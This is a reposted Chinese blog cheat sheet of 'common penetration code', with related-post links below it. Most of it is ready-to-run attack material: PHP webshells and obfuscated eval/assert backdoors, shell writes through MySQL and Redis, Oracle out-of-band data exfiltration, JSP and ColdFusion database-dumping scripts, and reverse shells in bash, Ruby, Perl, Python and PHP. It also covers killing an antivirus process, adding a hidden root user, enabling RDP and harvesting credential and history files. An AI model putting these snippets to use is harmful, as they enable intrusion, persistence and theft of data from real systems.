渗透常用代码

最新推荐文章于 2024-08-12 10:55:30 发布
最新推荐文章于 2024-08-12 10:55:30 发布
阅读量1.1k 收藏 4
点赞数
文章标签: php shell 数据库
原文链接:http://www.cnblogs.com/Chorder/p/9114508.html
版权

PHP相关

    <?php copy("http://x.x.x.x/shell.txt", "d:\www\shell.php"); ?>

    <?php include "$_GET['_']"; ?>

    <?php assert($_POST["1"]);?>

    <?php
    $url = "http://x.x.x.x/shell.txt";
    $contents = file_get_contents($url);
    echo $contents;
    ?>

Mysql数据库
phpmyadmin爆路径

    http://url/phpMyAdmin/libraries/select_lang.lib.php

SQL语句导出shell:

    select "<?php eval($_POST['1']);?>" into outfile 'C:\www\shell.php';

Redis数据库
写shell:

    config set dir D:\www
    config set dbfilename shell.php
    set webshell "<?php eval($_POST[x]);?>"
    save

Oracle数据库
查数据库ip

    select sys_context('userenv','ip_address') from dual

通过外连回传数据

    SELECT UTL_HTTP.request('http://target.com/getdata?data='||TABLE_NAME) FROM USER_TABLES WHERE ROWNUM<=1

查询所有表

    SELECT * FROM ALL_TABLES

查询当前用户表

    select table_name from user_tables;

查询所有表按大小排序

    SELECT TABLE_NAME,NUM_ROWS FROM ALL_TABLES   order by  NUM_ROWS  desc
    select table_name,NUM_ROWS from user_tables     order by  NUM_ROWS  desc

查询表前十条

    select  *   from  users  where  rownum < 10

分页查询 2000000 到 4000000

    SELECT * FROM (SELECT e.*,ROWNUM rn FROM (select * from user ) e WHERE ROWNUM <= 4000000) WHERE rn > 2000000

查询当前编码

    select userenv('language') from dual;

命令行执行

    export NLS_LANG="american_america.AL32UTF8"

拖库脚本
JSP1

    <%@ page contentType="text/html;charset=UTF-8"%>
    <%@ page import="java.io.*,java.lang.*,java.sql.*"%>
    <%
    Class.forName("oracle.jdbc.driver.OracleDriver");
    Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@172.0.0.1:1521:orabi", "admin", "admin");
    File f = new File("/webapps/ROOT/css/t1.txt");
    BufferedWriter bw = new BufferedWriter(new FileWriter(f));
    Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
    ResultSet rs=stmt.executeQuery("select  *   from  member where  rownum > 2000000");
    ResultSetMetaData rsmd = rs.getMetaData();
    int numberOfColumns = rsmd.getColumnCount();
    for(int i=1;i<numberOfColumns+1;i++){
        bw.write(rsmd.getColumnName(i)+",");
    }
    while (rs.next()){
        for(int i=1;i<numberOfColumns+1;i++){
            bw.write(rs.getString(i)+",");
        }
        bw.newLine();
        bw.flush();
    }
    out.print(rs);   
    %>

JSP2

    <%@ page contentType="text/html;charset=UTF-8"%>
    <%@ page import="java.io.*,java.lang.*,java.sql.*"%>
    <%
    Class.forName("oracle.jdbc.driver.OracleDriver");
    Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@127.0.0.1:1521", "admin", "password");
    Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
    String html="";
    File file = new File("/tmp/data.txt");
    BufferedReader br = new BufferedReader(new FileReader(file));
    String line;
    while ((line = br.readLine()) != null) {
        html=html+"<h3>"+line+":</h3><table border=1><tr>";
        ResultSet rs=stmt.executeQuery("select * from "+line+" where rownum < 100");
        ResultSetMetaData rsmd = rs.getMetaData();
        int numberOfColumns = rsmd.getColumnCount();
        for(int i=1;i<numberOfColumns+1;i++){
            html=html+"<th>"+rsmd.getColumnName(i)+"</th>";
        }
        html+="</tr>";
        while (rs.next()){
            html+="<tr>";
            for(int i=1;i<numberOfColumns+1;i++){
                html=html+"<td>"+rs.getString(i)+"</td>";
            }
            html+="</tr>";
        }
        rs.close();
        html+="<tr></table>";
    }
        File f = new File("/tmp/info.css");
        BufferedWriter bw = new BufferedWriter(new FileWriter(f));
        bw.write(html);
        bw.close();
        br.close();
        stmt.close();
        conn.close();
    %>

ColdFusion

    <CFSET USERNAME="user">
    <CFSET PASSWORD="pass">
    <CFSET DATABASE="ya_db">
    <CFTRY>
    <CFQUERY NAME="DATA" DATASOURCE=#DATABASE# USERNAME=#USERNAME# PASSWORD=#PASSWORD#>
    SELECT * FROM MEMBER
    </CFQUERY>
    <CFCATCH Type="Any"></CFCATCH>
    </CFTRY>
    <CFSAVECONTENT variable="Dump_DATA">
    <CFDUMP var="#DATA#" EXPAND="YES" FORMAT="TEXT">
    </CFSAVECONTENT>
    <cffile action="write" output="#Dump_DATA#" FILE="C:\\RECYCLER\\#USERNAME#_DATA.txt">

反弹shell
bash

    bash -i >& /dev/tcp/1.1.1.1/1234 0>&1
    rm -f /tmp/p; mknod /tmp/p p && telnet 1.1.1.1 1234 0/tmp/p

ruby

    ruby -rsocket -e'f=TCPSocket.open("1.1.1.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

perl

    perl -e 'use Socket;$i="1.1.1.1";
    $p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))
    if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
    open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python

    python -c 'import socket,subprocess,os;
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
    s.connect(("1.1.1.1",1234));
    os.dup2(s.fileno(),0);
    os.dup2(s.fileno(),1);
    os.dup2(s.fileno(),2);
    p=subprocess.call(["/bin/sh","-i"]);'

php

    php -r '$sock=fsockopen("1.1.1.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Windows取消共享文件夹安全警告

    @echo off
    Reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PolicIEs\Associations /v LowRiskFileTypes /t REG_SZ /d .exe;.reg;.msi;.bat;.cmd;.com;.vbs;.hta;.scr;.pif;.js;.lnk; /f

kill安全狗3.x

    ntsd -c q -pn SafeDogGuardCenter.exe

其他
python Simple HTTP服务:

    python -m SimpleHTTPServer

Linux相关技巧
压缩目录

    zip  -r  root.zip  /root/*
    tar -czvf root.tar.gz /root/
    tar -cvf  user/tmp/ooouser.tar  user/  --exclude=image --exclude= --exclude *.jpg --exclude *.gif  --exclude *.zip  --exclude *.bmp  --exclude *.eps --exclude *.psd

添加用户并设置密码

    useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof

收集所有.sh .pl .py .conf .cnf .ini .history .pass* (/usr/share目录里面的除外) 并打包成zip

    find / \! -path “/usr/share/*” -regex “.*\.sh$\|.*\.pl$\|.*\.py$\|.*\.conf$\|.*\.cnf$\|.*\.ini$\|.*\/\..*history$\|.*\/\..*pass.*” -print|zip pack.zip -@

array_push 后门

    array_map("ass\x65rt",(array)$_REQUEST['array']);

开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

转载于:https://www.cnblogs.com/Chorder/p/9114508.html

aibi3754
关注
脚本:用于渗透测试的脚本
02-05
用于测试的脚本。 fb-brute.pl =适用于Facebook的Bruteforce hash_id_v1.1.py =哈希标识符 painel.pl =管理员控制面板查找器 slowloris.pl =拒绝服务 g3m =拒绝服务 如何安装和使用 fb-brute.pl $ sudo chmod +x fb-brute.pl $ perl fb-brute.pl id-user-facebook wordlist.txt hash_id_v1.1.py $ sudo chmod +x hash_id_v1.1.py $ python2 hash_id_v1.1.py painel
渗透常用编码
dahe
06-12 1314
1.页面编码 在网页设置网页编码<head></head>中加入设置特定html标签 <meta charset="utf">
前端开发转行做渗透测试容易吗?通过挖漏洞来赚钱靠谱吗?
最新发布
QIANDXX的博客
08-12 666
渗透测试感兴趣的,学习起来喽~参考资料[1]渗透测试执行标准: http://www.pentest-standard.org/index.php/Main_Page[2]《XSS 扫描器成长记》: https://paper.seebug.org/1119/[3]xray 的规则化过的 POC(漏洞概念验证程序) 数据: https://github.com/chaitin/xray/tree/master/pocs[4][5][6][7][8][9][10][11]
web渗透编码
Blog_inG的博客
09-04 1228
. %2E ' %18 ;%3B / %2F " %22 > %3E   %20 = %3d 回车 %0A ../ %2e%2e%2f ..\ %2e%2e%5c ..\ %252e%252e%255c双层url编码 ../ ..%c0%af utf-8 ..\ ..%c1%9c %3C%2Fp%3E%20%3Cscript%3Ealert(1133441);%3C
渗透攻击代码共享站点
m0_46161993的博客
06-29 359
站点名称 网址 数据规模(千) Metasploit www.metasploit.com/modules/ 0.1~1 Exploit-db www.exploit-db.com 1~10 PacketStorm packetsrotmsecurity.org 10~100 SecurityFocus www.securityfocus.com/bid 1~10 SecurityReason securityreason.com/exploit_alert/ 1~10 ...
渗透基础代码
m0_74322086的博客
09-28 168
学习渗透的一个基础的代码,主要供学习使用,无太大的借鉴作用。
渗透测试常用poc、工具集合
01-06
本poc包含近100多个常用的poc,还有很多工具集。全是博主自己用的,现在免费分享,下面是列举的前10个poc: CVE-2019-0708-msf快速搭建 CVE-2019-10173 Xstream 1.4.10版本远程代码执行漏洞 CVE-2019-16131 OKLite v...
大牛输出-渗透测试常用poc、工具大集合.zip
08-13
在这个"大牛输出-渗透测试常用poc、工具大集合.zip"压缩包中,我们可以期待找到一系列用于渗透测试的重要资源,包括Proof of Concept(PoC)代码和各种渗透测试工具。 Proof of Concept(PoC)是证明一个安全漏洞...
渗透测试常用工具应用(PDF课件)
05-30
使用Kimi生成deb包进行代码捆绑实践.pdf Web传递获取靶机权限.pdf 使用EternalBlues进行Windows漏洞利用.pdf 使用cobaltstrike接口来传递MSF中的shell.pdf 使用Beef对客户端浏览器进行劫持.pdf 使用Armitage的MSF...
udec渗流代码
12-28
udec节理边坡的渗流分析,详细介绍地下水渗流下边坡失稳的过程
渗透
02-08
渗透
渗透学习测试网站源码打包带走
05-24
渗透学习测试网站源码打包带走。asp+access注入源码;cookie注入源码;DVWA漏洞平台测试源码;ewebeditor;fck漏洞源码;fck突破“_”源码;iis6.0解析漏洞源码;phpcms2008;php包含漏洞源码;WEBSHELL箱子系统V2.0;xss漏洞测试源码;搜索注入源码;制作高级webshell后门附带工具。
渗透测试平台
08-28
一款渗透测试实战平台。
一次渗透中的代码审计
hackzkaq的博客
03-05 169
更多黑客技能 公众号:小道黑客 本文旨在分享思路,不是分享exp然后批量getshell。 首先渗透的起因是这样的。那时候我闲着无聊看看补天的主页,发现有人提交了XX公司XX漏洞,奖金RMBXX元(具体记不太清了)。 然后我就想去捡捡漏。。。貌似大家都喜欢这样? 百度搜索了一下那公司的名字,找到了他们公司的官网。 一下还看不出是什么CMS,一般这种公司展示的网站都是用CMS做的,不会自己找程序员写新的。 大多都是dede。 拿到这个站后,先看看他的URL。 /news/index.php?c=show
编程代码:大神教你如何进行渗透测试
C语言C++学习俱乐部:765860056
12-27 3690
使用关键词得到目标源码 前言:对某网站进行渗透测试,此次渗透给的是一个主域名,并且也没有子域,打开了目标网站先对其进行一波信息收集 中间件: IIS 8.5 输入admin发现自动添加了/ 说明其目录存在,那么盲猜一波文件,login.aspx default.aspx main.aspx 等等 最终在login.aspx下面发现后台登录页面。这不猜他一波弱口令?? 一顿操作过后账号被锁 熟悉的开局,既然如此只能尝试其他方法了。 在主页的html代...
渗透测试——三、脚本编写
钟言的博客
12-02 5475
本篇为渗透测试的第三课,黑客实践之脚本编写,详细内容包含了:认识Python语言 1、Python语言概况 2、Python的特点 3、Python集成开发环境 4、Python环境的安装 编写Python扫描程序 1、Python 第三方模块 2、Socket模块 3、Scapy模板 4、利用Nmap模板扫描存活主机 5、构造TCP包扫描端口 6、利用Socket模块扫描端口 编写Python攻击脚本 1、ARP协议 2、SYN泛洪 3、字典攻击4、ARP欺骗攻击 5、SYN泛洪攻击 6、生成数据字典等等
CTF-SSH服务渗透代码详细解说
weixin_45441727的博客
03-01 1035
首先,我们先理解什么是SSH协议 SSH是(Secure SHell protocol) 的简写,即(安全外壳协议)。由 IETF 的网络小组(Network Working Group)制定。 以前我们都是使用rsh和telnet的明文传输,这样的话登录时的ID和密码数据就会直接在网络上暴露,相当于你在网络上被别人看的一清二楚。存在安全上的问题。而SSH提供了加密、校验和压缩,使得我们可以很安全的进行远程操作。不过这并不是绝对的,总有加密文件被破解的一天。但是相对与明文加密,这样还是好很多的。毕竟有密码和
XSS漏洞常用什么渗透测试代码
07-14
常用的XSS漏洞渗透测试代码有以下几种: 1. 弹窗测试代码: ```html <script>alert("XSS"); ``` 2. Cookie窃取测试代码: ```html <script>document.location='http://攻击者网站/steal....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值